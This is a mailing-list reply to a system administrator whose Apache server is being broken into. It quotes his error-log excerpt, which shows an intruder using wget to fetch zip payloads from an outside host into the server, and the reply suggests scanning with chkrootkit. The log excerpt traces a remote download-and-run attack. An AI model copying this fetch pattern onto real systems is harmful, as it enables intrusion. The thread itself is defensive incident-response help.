Dan Eskildsen wrote:
> Somehow my server is being hacked through Apache but I don't how they are
> getting in. The hackers upload files to my /tmp or /var/tmp directories,
> then they are able to execute the files that they upload.
>
> I have disabled the following in Apache: proxies and cgi but they are still
> getting in. Any ideas?
>
> I have discovered the following in Apache's error log.
>
>
>
>
> ###Following is a snip from me /var/log/httpd/error_log: ################
> --02:09:07-- http://rootsystem.100free.com/sk.zip
> => `sk.zip'
> Resolving rootsystem.100free.com... done.
> Connecting to rootsystem.100free.com[64.156.241.133]:80... connected.
> HTTP request sent, awaiting response... 302 Found
> Location: http://www.100free.com/404.html [following]
> --02:09:07-- http://www.100free.com/404.html
> => `404.html'
> Resolving www.100free.com... done.
> Connecting to www.100free.com[64.156.241.61]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 991 [text/html]
>
> 0K 100% 967.77
> KB/s
>
> 02:09:08 (967.77 KB/s) - `404.html' saved [991/991]
>
> chmod: failed to get attributes of `sk.zip': No such file or directory
> --02:09:55-- http://rootsystem.100free.com/dcpl.zip
> => `dcpl.zip'
> Resolving rootsystem.100free.com... done.
> Connecting to rootsystem.100free.com[64.156.241.133]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 759 [application/zip]
>
> 0K 100% 741.21
> KB/s
>
> 02:09:56 (741.21 KB/s) - `dcpl.zip' saved [759/759]
>
> ### End of snip ################
>
>

You might want to install chkrootkit and scan for known rootkits on the
system.

Dan